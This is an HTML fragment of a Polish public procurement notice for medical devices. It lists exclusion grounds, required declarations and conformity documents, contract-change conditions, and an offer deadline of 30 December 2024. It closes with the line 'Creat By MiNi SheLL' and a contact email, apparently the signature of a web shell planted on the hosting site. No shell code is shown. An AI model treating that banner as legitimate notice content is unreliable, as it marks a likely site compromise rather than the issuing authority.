środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie wykonawcy<br/>składane na podstawie art. 125 ust. 1 ustawy PZP – załącznik nr 5 do SWZ – dołączyć do oferty<br/>2. Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy PZP –<br/>Załącznik Nr 8 do SWZ (dokument składany na wezwanie)<br/>3. Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;<br/>4. Wykonawca, którego oferta zostanie najwyżej oceniona, zostanie wezwany przez Zamawiającego do złożenia oświadczenia, o<br/>którym mowa w art. 108 ust. 1 pkt 5 i 6 ustawy Pzp – o przynależności lub braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (t. j. Dz. U. z 2021 r. poz. 275), z innym Wykonawcą,<br/>który złożył odrębną ofertę (wzór – załącznik nr 7 do SWZ). Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić<br/>dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.<br/>deklaracja zgodności na zgodność z wymaganiami (DOTYCZY WYROBÓW MEDYCZNYCH):<br/>a) rozporządzenia Ministra Zdrowia z dnia 17 lutego 2016 r. w sprawie wymagań zasadniczych oraz procedur oceny zgodności<br/>wyrobów medycznych (Dz. U. poz. 211) albo<br/>b) dyrektywy 93/42/EWG, albo<br/>c) rozporządzenia (UE) 2017/745 w sprawie wyrobów medycznych<br/>d) rozporządzenia (UE) 2017/746 w sprawie wyrobów medycznych in vitro<br/>2. karta katalogowa zawierające wszystkie elementy wymagane przez zamawiającego w specyfikacji lub inny dokument je<br/>potwierdzający jeśli nie są zawarte na karcie katalogowej<br/>3. wpis do rejestru wyrobu medycznego lub potwierdzone zgłoszenie do rejestru wyrobu medycznego w Urzędzie Rejestracji<br/>Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 4)	Zgodnie z art. 107 ust. 2 Pzp, jeżeli Wykonawca nie złożył przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe są niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie. <br/>1.deklaracja zgodności na zgodność z wymaganiami (DOTYCZY WYROBÓW MEDYCZNYCH):<br/>a) rozporządzenia Ministra Zdrowia z dnia 17 lutego 2016 r. w sprawie wymagań zasadniczych oraz procedur oceny zgodności<br/>wyrobów medycznych (Dz. U. poz. 211) albo<br/>b) dyrektywy 93/42/EWG, albo<br/>c) rozporządzenia (UE) 2017/745 w sprawie wyrobów medycznych<br/>d) rozporządzenia (UE) 2017/746 w sprawie wyrobów medycznych in vitro<br/>2. karta katalogowa zawierające wszystkie elementy wymagane przez zamawiającego w specyfikacji lub inny dokument je<br/>potwierdzający jeśli nie są zawarte na karcie katalogowej<br/>3. wpis do rejestru wyrobu medycznego lub potwierdzone zgłoszenie do rejestru wyrobu medycznego w Urzędzie Rejestracji<br/>Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2) Pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego Zamawiający kieruje informacje, korespondencję, itp. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Dopuszczalna jest zmiana umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia:<br/>1) niezależnie od wartości tej zmiany, o ile została przewidziana w ogłoszeniu o zamówieniu lub dokumentach zamówienia,<br/>w postaci jasnych, precyzyjnych i jednoznacznych postanowień umownych, które mogą obejmować postanowienia<br/>dotyczące zasad wprowadzania zmian wysokości ceny, jeżeli spełniają one łącznie następujące warunki:<br/>a) określają rodzaj i zakres zmian,<br/>b) określają warunki wprowadzenia zmian,<br/>c) nie przewidują takich zmian, które modyfikowałyby ogólny charakter umowy;<br/>2) gdy nowy wykonawca ma zastąpić dotychczasowego wykonawcę:<br/>a) jeżeli taka możliwość została przewidziana w postanowieniach umownych, o których mowa w pkt 1, lub<br/>b) w wyniku sukcesji, wstępując w prawa i obowiązki wykonawcy, w następstwie przejęcia, połączenia, podziału,<br/>przekształcenia, upadłości, restrukturyzacji, dziedziczenia lub nabycia dotychczasowego wykonawcy lub jego<br/>przedsiębiorstwa, o ile nowy wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy<br/>wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy, a także nie ma na celu uniknięcia stosowania<br/>przepisów ustawy, lub c) w wyniku przejęcia przez zamawiającego zobowiązań wykonawcy względem jego podwykonawców, w przypadku, o<br/>którym mowa w art. 465 ust. 1;<br/>3) jeżeli dotyczy realizacji, przez dotychczasowego wykonawcę, dodatkowych dostaw, usług lub robót budowlanych, a w<br/>przypadku zamówień w dziedzinach obronności i bezpieczeństwa – usług lub robót budowlanych, których nie uwzględniono<br/>w zamówieniu podstawowym, o ile stały się one niezbędne i zostały spełnione łącznie następujące warunki:<br/>a) zmiana wykonawcy nie może zostać dokonana z powodów ekonomicznych lub technicznych, w szczególności<br/>dotyczących zamienności lub interoperacyjności wyposażenia, usług lub instalacji zamówionych w ramach zamówienia<br/>podstawowego,<br/>b) zmiana wykonawcy spowodowałaby istotną niedogodność lub znaczne zwiększenie kosztów dla zamawiającego,<br/>c) wzrost ceny spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej umowy, a w przypadku<br/>zamówień w dziedzinach obronności i bezpieczeństwa łączna wartość zmian nie przekracza 50% wartości pierwotnej<br/>umowy, z wyjątkiem należycie uzasadnionych przypadków;<br/>4) jeżeli konieczność zmiany umowy spowodowana jest okolicznościami, których zamawiający, działając z należytą<br/>starannością, nie mógł przewidzieć, o ile zmiana nie modyfikuje ogólnego charakteru umowy a wzrost ceny spowodowany<br/>każdą kolejną zmianą nie przekracza 50% wartości pierwotnej umowy.<br/>2. Dopuszczalne są również zmiany umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia, których<br/>łączna wartość jest mniejsza niż progi unijne oraz jest niższa niż 10% wartości pierwotnej umowy, w przypadku zamówień<br/>na usługi lub dostawy, albo 15%, w przypadku zamówień na roboty budowlane, a zmiany te nie powodują zmiany ogólnego<br/>charakteru umowy.<br/>3. W przypadkach, o których mowa w ust. 1 pkt 3 i 4, zamawiający:<br/>1) nie może wprowadzać kolejnych zmian umowy w celu uniknięcia stosowania przepisów ustawy;<br/>2) po dokonaniu zmiany umowy zamieszcza ogłoszenie o zmianie umowy w Biuletynie Zamówień Publicznych lub<br/>przekazuje Urzędowi Publikacji Unii Europejskiej.<br/>4. Jeżeli umowa zawiera postanowienia dotyczące zasad wprowadzania zmian wysokości cen, dopuszczalną wartość<br/>zmiany ceny, o której mowa w ust. 1 pkt 3 lit. c i pkt 4, lub dopuszczalną wartość zmiany umowy, o której mowa w ust. 2,<br/>ustala się w oparciu o zmienioną cenę.<br/>Pozostałe zmiany umowy zostały zawarte w Zał nr4 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-30 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://www.platformazakupowa.pl/transakcja/1040778</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-30 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com